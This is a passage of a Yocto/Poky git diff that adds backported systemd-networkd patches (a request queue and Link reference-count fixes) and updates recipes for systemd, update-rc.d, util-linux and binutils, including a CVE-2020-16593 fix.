<ranjitsinh.rathod@kpit.com> + +--- + src/basic/ordered-set.h | 11 +++++++++++ + 1 file changed, 11 insertions(+) + +diff --git a/src/basic/ordered-set.h b/src/basic/ordered-set.h +index a377f20b1f..64df41766f 100644 +--- a/src/basic/ordered-set.h ++++ b/src/basic/ordered-set.h +@@ -63,6 +63,17 @@ void ordered_set_print(FILE *f, const char *field, OrderedSet *s); + #define ORDERED_SET_FOREACH(e, s, i) \ + for ((i) = ITERATOR_FIRST; ordered_set_iterate((s), &(i), (void**)&(e)); ) + ++#define ordered_set_clear_with_destructor(s, f) \ ++ ({ \ ++ OrderedSet *_s = (s); \ ++ void *_item; \ ++ while ((_item = ordered_set_steal_first(_s))) \ ++ f(_item); \ ++ _s; \ ++ }) ++#define ordered_set_free_with_destructor(s, f) \ ++ ordered_set_free(ordered_set_clear_with_destructor(s, f)) ++ + DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free); + DEFINE_TRIVIAL_CLEANUP_FUNC(OrderedSet*, ordered_set_free_free); + diff --git a/poky/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch b/poky/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch new file mode 100644 index 0000000000..06c523834d --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/network-add-skeleton-of-request-queue.patch @@ -0,0 +1,285 @@ +From 19d9a5adf0c1a6b5a243eea0390f6f6526d569de Mon Sep 17 00:00:00 2001 +From: Yu Watanabe <watanabe.yu+github@gmail.com> +Date: Fri, 7 May 2021 15:39:16 +0900 +Subject: [PATCH] network: add skeleton of request queue + +This will be used in later commits. + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/19d9a5adf0c1a6b5a243eea0390f6f6526d569de] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + src/network/meson.build | 2 + + src/network/networkd-link.c | 20 +++++- + src/network/networkd-manager.c | 7 ++ + src/network/networkd-manager.h | 2 + + src/network/networkd-queue.c | 121 +++++++++++++++++++++++++++++++++ + src/network/networkd-queue.h | 42 ++++++++++++ + 6 files changed, 192 insertions(+), 2 deletions(-) + create mode 100644 src/network/networkd-queue.c + create mode 100644 src/network/networkd-queue.h + +diff --git a/src/network/meson.build b/src/network/meson.build +index 4fca3106dc..a8b9232e64 100644 +--- a/src/network/meson.build ++++ b/src/network/meson.build +@@ -105,6 +105,8 @@ sources = files(''' + networkd-network.h + networkd-nexthop.c + networkd-nexthop.h ++ networkd-queue.c ++ networkd-queue.h + networkd-route.c + networkd-route.h + networkd-routing-policy-rule.c +diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c +index 34359b2541..2f33305a27 100644 +--- a/src/network/networkd-link.c ++++ b/src/network/networkd-link.c +@@ -30,6 +30,7 @@ + #include "networkd-manager.h" + #include "networkd-ndisc.h" + #include "networkd-neighbor.h" ++#include "networkd-queue.h" + #include "networkd-radv.h" + #include "networkd-routing-policy-rule.h" + #include "networkd-wifi.h" + +@@ -2232,6 +2244,8 @@ static int link_reconfigure_internal(Link *link, sd_netlink_message *m, bool for + if (r < 0) + return r; + ++ link_drop_requests(link); ++ + r = link_drop_config(link); + if (r < 0) + return r; +@@ -2664,6 +2678,8 @@ static int link_carrier_lost(Link *link) { + return r; + } + ++ link_drop_requests(link); ++ + r = link_drop_config(link); + if (r < 0) + return r; +diff --git a/src/network/networkd-manager.c b/src/network/networkd-manager.c +index 562ce5ca54..fd576169a9 100644 +--- a/src/network/networkd-manager.c ++++ b/src/network/networkd-manager.c +@@ -34,6 +34,7 @@ + #include "networkd-manager-bus.h" + #include "networkd-manager.h" + #include "networkd-network-bus.h" ++#include "networkd-queue.h" + #include "networkd-speed-meter.h" + #include "ordered-set.h" + #include "path-util.h" +@@ -406,6 +407,10 @@ int manager_new(Manager **ret) { + if (r < 0) + return r; + ++ r = sd_event_add_post(m->event, NULL, manager_process_requests, m); ++ if (r < 0) ++ return r; ++ + r = manager_connect_rtnl(m); + if (r < 0) + return r; +@@ -446,6 +451,8 @@ Manager* manager_free(Manager *m) { + + free(m->state_file); + ++ m->request_queue = ordered_set_free_with_destructor(m->request_queue, request_free); ++ + while ((a = hashmap_first_key(m->dhcp6_prefixes))) + (void) dhcp6_prefix_remove(m, a); + m->dhcp6_prefixes = hashmap_free(m->dhcp6_prefixes); +diff --git a/src/network/networkd-manager.h b/src/network/networkd-manager.h +index 301b97c1a1..26e8802871 100644 +--- a/src/network/networkd-manager.h ++++ b/src/network/networkd-manager.h +@@ -91,6 +91,8 @@ struct Manager { + usec_t speed_meter_usec_old; + + bool dhcp4_prefix_root_cannot_set_table; ++ ++ OrderedSet *request_queue; + }; + + int manager_new(Manager **ret); +diff --git a/src/network/networkd-queue.c b/src/network/networkd-queue.c +new file mode 100644 +index 0000000000..24bb2c845d +--- /dev/null ++++ b/src/network/networkd-queue.c +@@ -0,0 +1,121 @@ ++/* SPDX-License-Identifier: LGPL-2.1-or-later */ ++ ++#include "networkd-address.h" ++#include "networkd-manager.h" ++#include "networkd-neighbor.h" ++#include "networkd-nexthop.h" ++#include "networkd-route.h" ++#include "networkd-routing-policy-rule.h" ++#include "networkd-queue.h" ++ ++static void request_free_object(RequestType type, void *object) { ++ switch(type) { ++ default: ++ assert_not_reached("invalid request type."); ++ } ++} ++ ++Request *request_free(Request *req) { ++ if (!req) ++ return NULL; ++ ++ if (req->on_free) ++ req->on_free(req); ++ if (req->consume_object) ++ request_free_object(req->type, req->object); ++ if (req->link && req->link->manager) ++ ordered_set_remove(req->link->manager->request_queue, req); ++ link_unref(req->link); ++ ++ return mfree(req); ++} ++ ++DEFINE_TRIVIAL_CLEANUP_FUNC(Request*, request_free); ++ ++void request_drop(Request *req) { ++ if (req->message_counter) ++ (*req->message_counter)--; ++ ++ request_free(req); ++} ++ ++int link_queue_request( ++ Link *link, ++ RequestType type, ++ void *object, ++ bool consume_object, ++ unsigned *message_counter, ++ link_netlink_message_handler_t netlink_handler, ++ Request **ret) { ++ ++ _cleanup_(request_freep) Request *req = NULL; ++ int r; ++ ++ assert(link); ++ assert(link->manager); ++ assert(type >= 0 && type < _REQUEST_TYPE_MAX); ++ assert(object); ++ assert(netlink_handler); ++ ++ req = new(Request, 1); ++ if (!req) { ++ if (consume_object) ++ request_free_object(type, object); ++ return -ENOMEM; ++ } ++ ++ *req = (Request) { ++ .link = link, ++ .type = type, ++ .object = object, ++ .consume_object = consume_object, ++ .message_counter = message_counter, ++ .netlink_handler = netlink_handler, ++ }; ++ ++ link_ref(link); ++ ++ r = ordered_set_ensure_put(&link->manager->request_queue, NULL, req); ++ if (r < 0) ++ return r; ++ ++ if (req->message_counter) ++ (*req->message_counter)++; ++ ++ if (ret) ++ *ret = req; ++ ++ TAKE_PTR(req); ++ return 0; ++} ++ ++int manager_process_requests(sd_event_source *s, void *userdata) { ++ Manager *manager = userdata; ++ int r; ++ ++ assert(manager); ++ ++ for (;;) { ++ bool processed = false; ++ Request *req; ++ Iterator i; ++ ORDERED_SET_FOREACH(req, manager->request_queue, i) { ++ switch(req->type) { ++ default: ++ return -EINVAL; ++ } ++ if (r < 0) ++ link_enter_failed(req->link); ++ if (r > 0) { ++ ordered_set_remove(manager->request_queue, req); ++ request_free(req); ++ processed = true; ++ } ++ } ++ ++ if (!processed) ++ break; ++ } ++ ++ return 0; ++} +diff --git a/src/network/networkd-queue.h b/src/network/networkd-queue.h +new file mode 100644 +index 0000000000..4558ae548f +--- /dev/null ++++ b/src/network/networkd-queue.h +@@ -0,0 +1,42 @@ ++/* SPDX-License-Identifier: LGPL-2.1-or-later */ ++#pragma once ++ ++#include "sd-event.h" ++ ++#include "networkd-link.h" ++ ++typedef struct Request Request; ++ ++typedef int (*request_after_configure_handler_t)(Request*, void*); ++typedef void (*request_on_free_handler_t)(Request*); ++ ++typedef enum RequestType { ++ _REQUEST_TYPE_MAX, ++ _REQUEST_TYPE_INVALID = -EINVAL, ++} RequestType; ++ ++typedef struct Request { ++ Link *link; ++ RequestType type; ++ bool consume_object; ++ void *object; ++ void *userdata; ++ unsigned *message_counter; ++ link_netlink_message_handler_t netlink_handler; ++ request_after_configure_handler_t after_configure; ++ request_on_free_handler_t on_free; ++} Request; ++ ++Request *request_free(Request *req); ++void request_drop(Request *req); ++ ++int link_queue_request( ++ Link *link, ++ RequestType type, ++ void *object, ++ bool consume_object, ++ unsigned *message_counter, ++ link_netlink_message_handler_t netlink_handler, ++ Request **ret); ++ ++int manager_process_requests(sd_event_source *s, void *userdata); diff --git a/poky/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch b/poky/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch new file mode 100644 index 0000000000..4c402e7e55 --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch @@ -0,0 +1,50 @@ +From 56001f023305ea99329e27141d6e6067596491a9 Mon Sep 17 00:00:00 2001 +From: Yu Watanabe <watanabe.yu+github@gmail.com> +Date: Mon, 17 May 2021 15:32:57 +0900 +Subject: [PATCH] network: also drop requests when link enters linger state + +Otherwise, if link is removed, several references to the link in remain +exist in requests. + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/56001f023305ea99329e27141d6e6067596491a9] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + src/network/networkd-link.c | 24 +++++++++++++----------- + 1 file changed, 13 insertions(+), 11 deletions(-) + +diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c +index 67d01ac44d..b56c232eca 100644 +--- a/src/network/networkd-link.c ++++ b/src/network/networkd-link.c +@@ -1771,6 +1771,18 @@ static void link_drop_from_master(Link *link, NetDev *netdev) { + link_unref(set_remove(master->slaves, link)); + } + ++static void link_drop_requests(Link *link) { ++ Request *req; ++ Iterator i; ++ ++ assert(link); ++ assert(link->manager); ++ ++ ORDERED_SET_FOREACH(req, link->manager->request_queue, i) ++ if (req->link == link) ++ request_drop(req); ++} ++ + void link_drop(Link *link) { + if (!link) + return; +@@ -1782,6 +1793,8 @@ void link_drop(Link *link) { + /* Drop all references from other links and manager. Note that async netlink calls may have + * references to the link, and they will be dropped when we receive replies. */ + ++ link_drop_requests(link); ++ + link_free_carrier_maps(link); + + if (link->network) { +-- +2.17.1 + diff --git a/poky/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch b/poky/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch new file mode 100644 index 0000000000..a186bb4095 --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch @@ -0,0 +1,278 @@ +From cc2d7efc5ca09a7de4bec55e80476986839a655c Mon Sep 17 00:00:00 2001 +From: Yu Watanabe <watanabe.yu+github@gmail.com> +Date: Fri, 14 May 2021 15:58:15 +0900 +Subject: [PATCH] network: fix Link reference counter issue + +Previously, when link_new() fails, `link_unref()` was called, so, +`Manager::links` may become dirty. +This introduces `link_drop_or_unref()` and it will be called on +failure. + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/cc2d7efc5ca09a7de4bec55e80476986839a655c] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + src/network/networkd-link.c | 240 ++++++++++++++++++------------------ + 1 file changed, 122 insertions(+), 118 deletions(-) + +diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c +index b56c232eca..d493afda4c 100644 +--- a/src/network/networkd-link.c ++++ b/src/network/networkd-link.c +@@ -540,109 +540,6 @@ static int link_update_flags(Link *link, + return 0; + } + +-static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) { +- _cleanup_(link_unrefp) Link *link = NULL; +- uint16_t type; +- const char *ifname, *kind = NULL; +- int r, ifindex; +- unsigned short iftype; +- +- assert(manager); +- assert(message); +- assert(ret); +- +- /* check for link kind */ +- r = sd_netlink_message_enter_container(message, IFLA_LINKINFO); +- if (r == 0) { +- (void) sd_netlink_message_read_string(message, IFLA_INFO_KIND, &kind); +- r = sd_netlink_message_exit_container(message); +- if (r < 0) +- return r; +- } +- +- r = sd_netlink_message_get_type(message, &type); +- if (r < 0) +- return r; +- else if (type != RTM_NEWLINK) +- return -EINVAL; +- +- r = sd_rtnl_message_link_get_ifindex(message, &ifindex); +- if (r < 0) +- return r; +- else if (ifindex <= 0) +- return -EINVAL; +- +- r = sd_rtnl_message_link_get_type(message, &iftype); +- if (r < 0) +- return r; +- +- r = sd_netlink_message_read_string(message, IFLA_IFNAME, &ifname); +- if (r < 0) +- return r; +- +- link = new(Link, 1); +- if (!link) +- return -ENOMEM; +- +- *link = (Link) { +- .n_ref = 1, +- .manager = manager, +- .state = LINK_STATE_PENDING, +- .ifindex = ifindex, +- .iftype = iftype, +- +- .n_dns = (unsigned) -1, +- .dns_default_route = -1, +- .llmnr = _RESOLVE_SUPPORT_INVALID, +- .mdns = _RESOLVE_SUPPORT_INVALID, +- .dnssec_mode = _DNSSEC_MODE_INVALID, +- .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID, +- }; +- +- link->ifname = strdup(ifname); +- if (!link->ifname) +- return -ENOMEM; +- +- if (kind) { +- link->kind = strdup(kind); +- if (!link->kind) +- return -ENOMEM; +- } +- +- r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t *)&link->master_ifindex); +- if (r < 0) +- log_link_debug_errno(link, r, "New device has no master, continuing without"); +- +- r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac); +- if (r < 0) +- log_link_debug_errno(link, r, "MAC address not found for new device, continuing without"); +- +- if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0) +- return -ENOMEM; +- +- if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0) +- return -ENOMEM; +- +- if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0) +- return -ENOMEM; +- +- r = hashmap_ensure_allocated(&manager->links, NULL); +- if (r < 0) +- return r; +- +- r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link); +- if (r < 0) +- return r; +- +- r = link_update_flags(link, message, false); +- if (r < 0) +- return r; +- +- *ret = TAKE_PTR(link); +- +- return 0; +-} +- + void link_ntp_settings_clear(Link *link) { + link->ntp = strv_free(link->ntp); + } +@@ -2030,9 +1927,9 @@ static void link_drop_requests(Link *lin + request_drop(req); + } + +-void link_drop(Link *link) { ++Link *link_drop(Link *link) { + if (!link) +- return; ++ return NULL; + + assert(link->manager); + +@@ -2057,7 +1954,7 @@ void link_drop(Link *link) { + + /* The following must be called at last. */ + assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link); +- link_unref(link); ++ return link_unref(link); + } + + static int link_joined(Link *link) { +@@ -3295,6 +3192,112 @@ ipv4ll_address_fail: + + return 0; + } ++ ++static Link *link_drop_or_unref(Link *link) { ++ if (!link) ++ return NULL; ++ if (!link->manager) ++ return link_unref(link); ++ return link_drop(link); ++} ++ ++DEFINE_TRIVIAL_CLEANUP_FUNC(Link*, link_drop_or_unref); ++ ++static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) { ++ _cleanup_(link_drop_or_unrefp) Link *link = NULL; ++ uint16_t type; ++ _cleanup_free_ char *ifname = NULL, *kind = NULL; ++ int r, ifindex; ++ unsigned short iftype; ++ ++ assert(manager); ++ assert(message); ++ assert(ret); ++ ++ r = sd_netlink_message_get_type(message, &type); ++ if (r < 0) ++ return r; ++ else if (type != RTM_NEWLINK) ++ return -EINVAL; ++ ++ r = sd_rtnl_message_link_get_ifindex(message, &ifindex); ++ if (r < 0) ++ return r; ++ else if (ifindex <= 0) ++ return -EINVAL; ++ ++ r = sd_rtnl_message_link_get_type(message, &iftype); ++ if (r < 0) ++ return r; ++ ++ r = sd_netlink_message_read_string_strdup(message, IFLA_IFNAME, &ifname); ++ if (r < 0) ++ return r; ++ ++ /* check for link kind */ ++ r = sd_netlink_message_enter_container(message, IFLA_LINKINFO); ++ if (r >= 0) { ++ (void) sd_netlink_message_read_string_strdup(message, IFLA_INFO_KIND, &kind); ++ r = sd_netlink_message_exit_container(message); ++ if (r < 0) ++ return r; ++ } ++ ++ link = new(Link, 1); ++ if (!link) ++ return -ENOMEM; ++ ++ *link = (Link) { ++ .n_ref = 1, ++ .state = LINK_STATE_PENDING, ++ .ifindex = ifindex, ++ .iftype = iftype, ++ .ifname = TAKE_PTR(ifname), ++ .kind = TAKE_PTR(kind), ++ ++ .n_dns = (unsigned) -1, ++ .dns_default_route = -1, ++ .llmnr = _RESOLVE_SUPPORT_INVALID, ++ .mdns = _RESOLVE_SUPPORT_INVALID, ++ .dnssec_mode = _DNSSEC_MODE_INVALID, ++ .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID, ++ }; ++ ++ r = hashmap_ensure_allocated(&manager->links, NULL); ++ if (r < 0) ++ return r; ++ ++ r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link); ++ if (r < 0) ++ return r; ++ ++ link->manager = manager; ++ ++ r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t*) &link->master_ifindex); ++ if (r < 0) ++ log_link_debug_errno(link, r, "New device has no master, continuing without"); ++ ++ r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac); ++ if (r < 0) ++ log_link_debug_errno(link, r, "MAC address not found for new device, continuing without"); ++ ++ if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0) ++ return -ENOMEM; ++ ++ if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0) ++ return -ENOMEM; ++ ++ if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0) ++ return -ENOMEM; ++ ++ r = link_update_flags(link, message, false); ++ if (r < 0) ++ return r; ++ ++ *ret = TAKE_PTR(link); ++ ++ return 0; ++} + + int link_add(Manager *m, sd_netlink_message *message, Link **ret) { + _cleanup_(sd_device_unrefp) sd_device *device = NULL; + +--- a/src/network/networkd-link.h 2021-09-02 18:04:16.900542857 +0530 ++++ b/src/network/networkd-link.h 2021-09-02 18:18:56.776571563 +0530 +@@ -175,7 +175,7 @@ DEFINE_TRIVIAL_DESTRUCTOR(link_netlink_d + + int link_get(Manager *m, int ifindex, Link **ret); + int link_add(Manager *manager, sd_netlink_message *message, Link **ret); +-void link_drop(Link *link); ++Link *link_drop(Link *link); + + int link_down(Link *link, link_netlink_message_handler_t callback); + + diff --git a/poky/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch b/poky/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch new file mode 100644 index 0000000000..65bdc611df --- /dev/null +++ b/poky/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch @@ -0,0 +1,67 @@ +From 63130eb36dc51e4fd50716c585f98ebe456ca7cf Mon Sep 17 00:00:00 2001 +From: Yu Watanabe <watanabe.yu+github@gmail.com> +Date: Mon, 17 May 2021 15:40:15 +0900 +Subject: [PATCH] network: merge link_drop() and link_detach_from_manager() + +link_detach_from_manager() is only called by link_drop(). It is not +necessary to split such tiny function. + +Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/63130eb36dc51e4fd50716c585f98ebe456ca7cf] +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + src/network/networkd-link.c | 27 ++++++++++++--------------- + 1 file changed, 12 insertions(+), 15 deletions(-) + +diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c +index 9d30e16b0a..67d01ac44d 100644 +--- a/src/network/networkd-link.c ++++ b/src/network/networkd-link.c +@@ -2019,24 +2019,17 @@ static void link_drop_from_master(Link *link, NetDev *netdev) { + link_unref(set_remove(master->slaves, link)); + } + +-static void link_detach_from_manager(Link *link) { +- if (!link || !link->manager) +- return; +- +- link_unref(set_remove(link->manager->links_requesting_uuid, link)); +- link_clean(link); +- +- /* The following must be called at last. */ +- assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link); +- link_unref(link); +-} +- + void link_drop(Link *link) { +- if (!link || link->state == LINK_STATE_LINGER) ++ if (!link) + return; + ++ assert(link->manager); ++ + link_set_state(link, LINK_STATE_LINGER); + ++ /* Drop all references from other links and manager. Note that async netlink calls may have ++ * references to the link, and they will be dropped when we receive replies. */ ++ + link_free_carrier_maps(link); + + if (link->network) { +@@ -2044,10 +2037,14 @@ void link_drop(Link *link) { + link_drop_from_master(link, link->network->bond); + } + +- log_link_debug(link, "Link removed"); ++ link_unref(set_remove(link->manager->links_requesting_uuid, link)); + + (void) unlink(link->state_file); +- link_detach_from_manager(link); ++ link_clean(link); ++ ++ /* The following must be called at last. */ ++ assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link); ++ link_unref(link); + } + + static int link_joined(Link *link) { diff --git a/poky/meta/recipes-core/systemd/systemd_244.5.bb b/poky/meta/recipes-core/systemd/systemd_244.5.bb index 7a7eddcd45..b6f5a47d63 100644 --- a/poky/meta/recipes-core/systemd/systemd_244.5.bb +++ b/poky/meta/recipes-core/systemd/systemd_244.5.bb @@ -22,6 +22,12 @@ SRC_URI += "file://touchscreen.rules \ file://0003-implment-systemd-sysv-install-for-OE.patch \ file://CVE-2021-33910.patch \ file://CVE-2020-13529.patch \ + file://basic-pass-allocation-info-for-ordered-set-new-and-introd.patch \ + file://introduce-ordered_set_clear-free-with-destructor.patch \ + file://network-add-skeleton-of-request-queue.patch \ + file://network-merge-link_drop-and-link_detach_from_manager.patch \ + file://network-also-drop-requests-when-link-enters-linger-state.patch \ + file://network-fix-Link-reference-counter-issue.patch \ " # patches needed by musl @@ -90,6 +96,7 @@ PACKAGECONFIG ??= " \ timesyncd \ utmp \ vconsole \ + wheel-group \ xz \ " @@ -182,6 +189,7 @@ PACKAGECONFIG[sbinmerge] = "-Dsplit-bin=false,-Dsplit-bin=true" PACKAGECONFIG[utmp] = "-Dutmp=true,-Dutmp=false" PACKAGECONFIG[valgrind] = "-DVALGRIND=1,,valgrind" PACKAGECONFIG[vconsole] = "-Dvconsole=true,-Dvconsole=false,,${PN}-vconsole-setup" +PACKAGECONFIG[wheel-group] = "-Dwheel-group=true, -Dwheel-group=false" # Verify keymaps on locale change PACKAGECONFIG[xkbcommon] = "-Dxkbcommon=true,-Dxkbcommon=false,libxkbcommon" PACKAGECONFIG[xz] = "-Dxz=true,-Dxz=false,xz" diff --git a/poky/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb b/poky/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb index da716674c3..daee5c224b 100644 --- a/poky/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb +++ b/poky/meta/recipes-core/update-rc.d/update-rc.d_0.8.bb @@ -6,7 +6,7 @@ SECTION = "base" LICENSE = "GPLv2+" LIC_FILES_CHKSUM = "file://update-rc.d;beginline=5;endline=15;md5=d40a07c27f535425934bb5001f2037d9" -SRC_URI = "git://git.yoctoproject.org/update-rc.d" +SRC_URI = "git://git.yoctoproject.org/update-rc.d;branch=master" SRCREV = "8636cf478d426b568c1be11dbd9346f67e03adac" UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-core/util-linux/util-linux.inc b/poky/meta/recipes-core/util-linux/util-linux.inc index 0e85603d9a..7b780352be 100644 --- a/poky/meta/recipes-core/util-linux/util-linux.inc +++ b/poky/meta/recipes-core/util-linux/util-linux.inc @@ -59,12 +59,13 @@ python util_linux_binpackages () { continue pkg = os.path.basename(os.readlink(file)) - extras[pkg] = extras.get(pkg, '') + ' ' + file.replace(dvar, '', 1) + extras.setdefault(pkg, []) + extras[pkg].append(file.replace(dvar, '', 1)) pn = d.getVar('PN') for pkg, links in extras.items(): of = d.getVar('FILES_' + pn + '-' + pkg) - links = of + links + links = of + " " + " ".join(sorted(links)) d.setVar('FILES_' + pn + '-' + pkg, links) } @@ -94,7 +95,7 @@ EXTRA_OECONF = "\ \ --disable-bfs --disable-chfn-chsh --disable-login \ --disable-makeinstall-chown --disable-minix --disable-newgrp \ - --disable-use-tty-group --disable-vipw \ + --disable-use-tty-group --disable-vipw --disable-raw \ \ --without-udev \ \ diff --git a/poky/meta/recipes-devtools/binutils/binutils-2.34.inc b/poky/meta/recipes-devtools/binutils/binutils-2.34.inc index 3e10279b1d..6104bec591 100644 --- a/poky/meta/recipes-devtools/binutils/binutils-2.34.inc +++ b/poky/meta/recipes-devtools/binutils/binutils-2.34.inc @@ -48,5 +48,7 @@ SRC_URI = "\ file://CVE-2020-16598.patch \ file://CVE-2021-20197.patch \ file://CVE-2021-3487.patch \ + file://CVE-2021-3549.patch \ + file://CVE-2020-16593.patch \ " S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch b/poky/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch index 11a8110d40..88cce49e46 100644 --- a/poky/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch +++ b/poky/meta/recipes-devtools/binutils/binutils/0009-warn-for-uses-of-system-directories-when-cross-linki.patch @@ -1,4 +1,4 @@ -From 7b24f81e04c9d00d96de7dbd250beade6d2c6e44 Mon Sep 17 00:00:00 2001 +From 12b658c0fe5771d16067baef933b7f34ed455def Mon Sep 17 00:00:00 2001 From: Khem Raj <raj.khem@gmail.com> Date: Fri, 15 Jan 2016 06:31:09 +0000 Subject: [PATCH] warn for uses of system directories when cross linking @@ -59,8 +59,8 @@ Signed-off-by: Khem Raj <raj.khem@gmail.com> ld/ldfile.c | 17 +++++++++++++++++ ld/ldlex.h | 2 ++ ld/ldmain.c | 2 ++ - ld/lexsup.c | 15 +++++++++++++++ - 9 files changed, 85 insertions(+) + ld/lexsup.c | 16 ++++++++++++++++ + 9 files changed, 86 insertions(+) diff --git a/ld/config.in b/ld/config.in index d93c9b0830..5da2742bea 100644 @@ -77,10 +77,10 @@ index d93c9b0830..5da2742bea 100644 #undef EXTRA_SHLIB_EXTENSION diff --git a/ld/configure b/ld/configure -index 811134a503..f8c17c19ae 100755 +index f432f4637d..a9da3c115e 100755 --- a/ld/configure +++ b/ld/configure -@@ -826,6 +826,7 @@ with_lib_path +@@ -830,6 +830,7 @@ with_lib_path enable_targets enable_64_bit_bfd with_sysroot @@ -88,7 +88,7 @@ index 811134a503..f8c17c19ae 100755 enable_gold enable_got enable_compressed_debug_sections -@@ -1491,6 +1492,8 @@ Optional Features: +@@ -1495,6 +1496,8 @@ Optional Features: --disable-largefile omit support for large files --enable-targets alternative target configurations --enable-64-bit-bfd 64-bit support (on hosts with narrower word sizes) @@ -97,7 +97,7 @@ index 811134a503..f8c17c19ae 100755 --enable-gold[=ARG] build gold [ARG={default,yes,no}] --enable-got=<type> GOT handling scheme (target, single, negative, multigot) -@@ -15788,6 +15791,19 @@ fi +@@ -16624,6 +16627,19 @@ fi @@ -222,10 +222,10 @@ index 5287f19a7f..55096e4fc9 100644 /* The initial parser states. */ diff --git a/ld/ldmain.c b/ld/ldmain.c -index da1ad17763..12d0b07d8a 100644 +index c4af10f4e9..95b56b2d2d 100644 --- a/ld/ldmain.c +++ b/ld/ldmain.c -@@ -274,6 +274,8 @@ main (int argc, char **argv) +@@ -273,6 +273,8 @@ main (int argc, char **argv) command_line.warn_mismatch = TRUE; command_line.warn_search_mismatch = TRUE; command_line.check_section_addresses = -1; @@ -235,7 +235,7 @@ index da1ad17763..12d0b07d8a 100644 /* We initialize DEMANGLING based on the environment variable COLLECT_NO_DEMANGLE. The gcc collect2 program will demangle the diff --git a/ld/lexsup.c b/ld/lexsup.c -index 3d15cc491d..0e8b4f2b7a 100644 +index 3d15cc491d..6478821443 100644 --- a/ld/lexsup.c +++ b/ld/lexsup.c @@ -550,6 +550,14 @@ static const struct ld_option ld_options[] = @@ -253,10 +253,10 @@ index 3d15cc491d..0e8b4f2b7a 100644 }; #define OPTION_COUNT ARRAY_SIZE (ld_options) -@@ -1603,6 +1611,13 @@ parse_args (unsigned argc, char **argv) - +@@ -1604,6 +1612,14 @@ parse_args (unsigned argc, char **argv) case OPTION_PRINT_MAP_DISCARDED: config.print_map_discarded = TRUE; + break; + + case OPTION_NO_POISON_SYSTEM_DIRECTORIES: + command_line.poison_system_directories = FALSE; @@ -264,6 +264,6 @@ index 3d15cc491d..0e8b4f2b7a 100644 + + case OPTION_ERROR_POISON_SYSTEM_DIRECTORIES: + command_line.error_poison_system_directories = TRUE; - break; ++ break; } } diff --git a/poky/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch b/poky/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch new file mode 100644 index 0000000000..cbe4a50507 --- /dev/null +++ b/poky/meta/recipes-devtools/binutils/binutils/CVE-2020-16593.patch @@ -0,0 +1,204 @@ +From aec72fda3b320c36eb99fc1c4cf95b10fc026729 Mon Sep 17 00:00:00 2001 +From: Alan Modra <amodra@gmail.com> +Date: Thu, 16 Apr 2020 17:49:38 +0930 +Subject: [PATCH] PR25827, Null pointer dereferencing in scan_unit_for_symbols + + PR 25827 + * dwarf2.c (scan_unit_for_symbols): Wrap overlong lines. Don't + strdup(0). + +Upstream-Status: Backport +https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=aec72fda3b320c36eb99fc1c4cf95b10fc026729 +CVE: CVE-2020-16593 +Signed-off-by: Armin Kuster <akuster@mvista.com> + + +Index: git/bfd/dwarf2.c +=================================================================== +--- git.orig/bfd/dwarf2.c ++++ 